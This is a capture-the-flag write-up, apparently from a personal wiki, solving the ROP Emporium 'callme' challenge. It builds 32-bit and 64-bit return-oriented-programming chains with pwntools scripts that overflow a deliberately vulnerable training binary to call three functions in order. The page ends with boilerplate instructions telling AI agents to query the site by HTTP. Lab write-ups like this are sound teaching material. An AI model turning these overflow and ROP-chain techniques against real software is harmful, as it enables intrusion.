# callme ### Analysis As per the instructions on the website > You must call **callme\_one(), callme\_two()** and **callme\_three()** in that order, each with the arguments 1,2,3 e.g. **callme\_one(1,2,3)** to print the flag. So let's look at our friend `usefulFunction`. ```bash pwndbg> disass usefulFunction Dump of assembler code for function usefulFunction: 0x0804880c <+0>: push ebp 0x0804880d <+1>: mov ebp,esp 0x0804880f <+3>: sub esp,0x8 0x08048812 <+6>: sub esp,0x4 0x08048815 <+9>: push 0x6 0x08048817 <+11>: push 0x5 0x08048819 <+13>: push 0x4 0x0804881b <+15>: call 0x80485b0 0x08048820 <+20>: add esp,0x10 0x08048823 <+23>: sub esp,0x4 0x08048826 <+26>: push 0x6 0x08048828 <+28>: push 0x5 0x0804882a <+30>: push 0x4 0x0804882c <+32>: call 0x8048620 0x08048831 <+37>: add esp,0x10 0x08048834 <+40>: sub esp,0x4 0x08048837 <+43>: push 0x6 0x08048839 <+45>: push 0x5 0x0804883b <+47>: push 0x4 0x0804883d <+49>: call 0x80485c0 0x08048842 <+54>: add esp,0x10 0x08048845 <+57>: sub esp,0xc 0x08048848 <+60>: push 0x1 0x0804884a <+62>: call 0x80485e0 End of assembler dump. ``` So we have all the three required function calls, but in reverse order, and with different parameters, so calling this function won't get use the flag we are looking for, but we have function calls available to us in the PLT, which is good. So we'll have to build a ROP chain to call these three functions, in the right order (one, two, three) and with right parameters (1, 2, 3). ### 32 bit So we have the PLT addresses available for the three function calls. ```bash callme_one - 0x80485c0 callme_two - 0x8048620 callme_three - 0x80485b0 ``` The offset to `EIP` is at 44 bytes. So our exploit should look something like this ```bash JUNK + Call to one + JUMP TO call two + 1 + 2 + 3 -> Repeat ``` So now we have to find a way to jump pass the 3 parameters and call the other function once the first function is done execution. In this case I found a ROP gadget that pops the value from stack into 3 different registers and then returns back to the stack. ```bash 0x080488a9 : pop esi ; pop edi ; pop ebp ; ret ``` So now our exploit will look something like this. ```bash JUNK + call_one + ROP_GADGET + 1 + 2 + 3 + call_two > Repeat ``` So let's construct the exploit and get our flag. Note: {% code title="exploit.py" %} ```python from pwn import * offset = "A"*44 call_one = p32(0x80485c0) + p32(0x080488a9) + p32(1) + p32(2) + p32(3) call_two = p32(0x8048620) + p32(0x080488a9) + p32(1) + p32(2) + p32(3) call_thr = p32(0x80485b0) + "JUNK" + p32(1) + p32(2) + p32(3) print offset + call_one + call_two + call_thr ``` {% endcode %} ```bash $ python exploit.py > exploit.payload $ cat exploit.payload | ./callme32 callme by ROP Emporium 32bits Hope you read the instructions... > ROPE{a_placeholder_32byte_flag!}Segmentation fault ``` ### 64 bit So due to change in how parameters are passed to `x64` architecture systems, we'll have to alter our exploit generation process. Now our exploit will look something like this ```bash Gadget_to_load_parameters + Parameters + Function Call > Repeat ``` So in `x64` parameters are loaded in this order, `RDI`, `RSI`, `RDX`, and so on. Apparently we were able to find a gadget that just that did. ```bash 0x0000000000401ab0 : pop rdi ; pop rsi ; pop rdx ; ret ``` And the `PLT` addresses for the functions were available from the disassembly of the `usefulFunction`. ```bash 0x401850 - ONE 0x401870 - TWO 0x401810 - THREE ``` So now let's construct our final exploit and get the flag. ```python from pwn import * offset = "A"*40 one = p64(0x401ab0) + p64(1) + p64(2) + p64(3) + p64(0x401850) two = p64(0x401ab0) + p64(1) + p64(2) + p64(3) + p64(0x401870) three = p64(0x401ab0) + p64(1) + p64(2) + p64(3) + p64(0x401810) print offset + one + two + three ``` ```bash $ python exploit.py > exploit.payload; cat exploit.payload | ./callme callme by ROP Emporium 64bits Hope you read the instructions... > ROPE{a_placeholder_32byte_flag!} ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jtnydv.gitbook.io/wiki/write-ups/rop-emporium/callme.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.